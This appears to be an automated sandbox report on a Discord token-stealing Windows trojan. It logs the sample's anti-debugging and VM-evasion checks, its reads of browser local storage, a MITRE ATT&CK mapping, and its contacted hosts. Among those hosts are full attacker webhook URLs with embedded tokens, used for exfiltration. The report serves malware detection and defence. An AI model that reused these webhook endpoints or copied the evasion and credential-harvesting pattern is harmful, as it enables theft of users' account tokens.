Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2455			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 958			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5568	Thread sleep count: 2455 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5568	Thread sleep count: 958 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6108	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\CFuejz2dRu.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM Win32_Processor

Source: C:\Users\user\Desktop\CFuejz2dRu.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	File Volume queried: \Device\CdRom0\ FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: CFuejz2dRu.exe, 00000000.00000002.1594712906.000001C0D5E1C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\CFuejz2dRu.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\CFuejz2dRu.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [Diagnostics.Debugger]::IsAttached

Jump to behavior

Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\CFuejz2dRu.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Discord Token Stealer

Source: Yara match	File source: 00000000.00000002.1591335139.000000C000016000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CFuejz2dRu.exe PID: 5460, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\CFuejz2dRu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb			Jump to behavior
Source: C:\Users\user\Desktop\CFuejz2dRu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log			Jump to behavior

Remote Access Functionality

Yara detected Discord Token Stealer

Source: Yara match	File source: 00000000.00000002.1591335139.000000C000016000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CFuejz2dRu.exe PID: 5460, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Modify Registry	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	1 Proxy	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CFuejz2dRu.exe	37%	ReversingLabs	Win64.Trojan.GenSteal

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/1300019313184608266/FeQlgT1nouUBj-HNeYycjpr9Nw2LI_OPHxx-u8ZXx5mMbMn1xnI5pbwKHfVTgTRkzJCv	0%	Avira URL Cloud	safe
http://o.pki.goog/s/we1/Rk8http://i.pki.goog/we1.crt	0%	Avira URL Cloud	safe
http://c.pki.goog/r/gsr1.crl	0%	Avira URL Cloud	safe
https://jsonblob.com/	0%	Avira URL Cloud	safe
http://i.pki.goog/r4.crtGlobalSign	0%	Avira URL Cloud	safe
http://c.pki.goog/we1/fJedmL2peto.crl	0%	Avira URL Cloud	safe
http://c.pki.goog/we1/fJedmL2peto.crl0	0%	Avira URL Cloud	safe
https://jsonblob.com/api/jsonBlob	0%	Avira URL Cloud	safe
http://c.pki.goog/r/r4.crl	0%	Avira URL Cloud	safe
http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crl	0%	Avira URL Cloud	safe
https://goatherd.ddns.net/webhook/1218887559619412029/Eva2oRkKwFen8y0e2duZ2zkjwo66NO-HdAdY99U_FseLCs0vvbTTUpzvmBAHiUakxGb3	0%	Avira URL Cloud	safe
http://o.pki.goog/s/we1/Rk80%	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt	0%	Avira URL Cloud	safe
http://o.pki.goog/s/we1/Rk8	0%	Avira URL Cloud	safe
http://i.pki.goog/gsr1.crt	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt	0%	Avira URL Cloud	safe
http://i.pki.goog/we1.crt	0%	Avira URL Cloud	safe
http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crlCertCreateCertificateContextCertFreeCertificat	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
discord.com	162.159.137.232	true	false	unknown
raw.githubusercontent.com	185.199.108.133	true	false	unknown
api.ipify.org	104.26.13.205	true	false	high
jsonblob.com	188.114.97.3	true	false	unknown
goatherd.ddns.net	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1300019313184608266/FeQlgT1nouUBj-HNeYycjpr9Nw2LI_OPHxx-u8ZXx5mMbMn1xnI5pbwKHfVTgTRkzJCv	false	Avira URL Cloud: safe	unknown
https://jsonblob.com/api/jsonBlob	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt	false	Avira URL Cloud: safe	unknown
https://goatherd.ddns.net/webhook/1218887559619412029/Eva2oRkKwFen8y0e2duZ2zkjwo66NO-HdAdY99U_FseLCs0vvbTTUpzvmBAHiUakxGb3	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://i.pki.goog/gsr1.crt0-	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp	false		high
http://o.pki.goog/s/we1/Rk8http://i.pki.goog/we1.crt	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://c.pki.goog/r/r4.crl0	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp	false		high
http://i.pki.goog/r4.crtGlobalSign	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i.pki.goog/we1.crt0	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmp	false		high
http://c.pki.goog/we1/fJedmL2peto.crl0	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jsonblob.com/	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C0000E8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://c.pki.goog/r/gsr1.crl0	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp	false		high
http://i.pki.goog/r4.crt0	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp	false		high
http://c.pki.goog/r/gsr1.crl	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://c.pki.goog/r/r4.crl	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://c.pki.goog/we1/fJedmL2peto.crl	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crl	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i.pki.goog/gsr1.crt	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crlCertCreateCertificateContextCertFreeCertificat	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://o.pki.goog/s/we1/Rk80%	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://o.pki.goog/s/we1/Rk8	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i.pki.goog/we1.crt	CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.137.232	discord.com	United States	13335	CLOUDFLARENETUS	false
188.114.97.3	jsonblob.com	European Union	13335	CLOUDFLARENETUS	false
185.199.108.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
86.237.153.121	unknown	France	3215	FranceTelecom-OrangeFR	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1548554
Start date and time:	2024-11-04 16:23:34 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CFuejz2dRu.exe renamed because original name is a hash value
Original Sample Name:	5f343fef68caa4a9bfd673cd071b7f6dbac55995433735e35af63e018cabae3f.exe
Detection:	MAL
Classification:	mal76.troj.spyw.evad.winEXE@4/3@5/5
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target CFuejz2dRu.exe, PID 5460 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: CFuejz2dRu.exe

Simulations

Behavior and APIs

Time	Type	Description
10:24:40	API Interceptor	1x Sleep call for process: CFuejz2dRu.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.137.232	file.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.FileRepMalware.22561.28030.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse
	570ZenR882.exe	Get hash	malicious	Unknown	Browse
	Ff0ZjqSI9Y.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.3620.22364.exe	Get hash	malicious	Unknown	Browse
	EUOgPjsBTC.exe	Get hash	malicious	Unknown	Browse
	webhook.ps1	Get hash	malicious	Unknown	Browse
	sys_upd.ps1	Get hash	malicious	Unknown	Browse
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse
	cr_asm2.ps1	Get hash	malicious	Unknown	Browse
188.114.97.3	QUOTATION_NOVQTRA071244.PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/16zkKlMo/download
	SecuriteInfo.com.Trojan.DownLoader47.46584.19040.8588.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.46584.19040.8588.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	Ponta Saheb. PO 4400049817.exe	Get hash	malicious	FormBook	Browse	www.1450thedove.com/z3su/
	URGENT REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	A4mmSHCUi2.exe	Get hash	malicious	FormBook	Browse	www.awarnkishesomber.space/rmi6/
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.timizoasisey.shop/3p0l/
	lf1SPbZI3V.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/alpha2/five/fre.php
	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/vdlzo
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	file.exe	Get hash	malicious	Growtopia	Browse	162.159.138.232
	file.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	gMd6of50Do.exe	Get hash	malicious	Blank Grabber	Browse	162.159.136.232
	El9HaBFrFM.exe	Get hash	malicious	Blank Grabber	Browse	162.159.128.233
	aLRjksjY78.exe	Get hash	malicious	HackBrowser	Browse	162.159.136.232
	jF5cZUXeQm.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	SecuriteInfo.com.FileRepMalware.22561.28030.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	162.159.136.232
	SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	162.159.138.232
	runtime.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	runtime.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
raw.githubusercontent.com	Purchase order.vbs	Get hash	malicious	Unknown	Browse	185.199.109.133
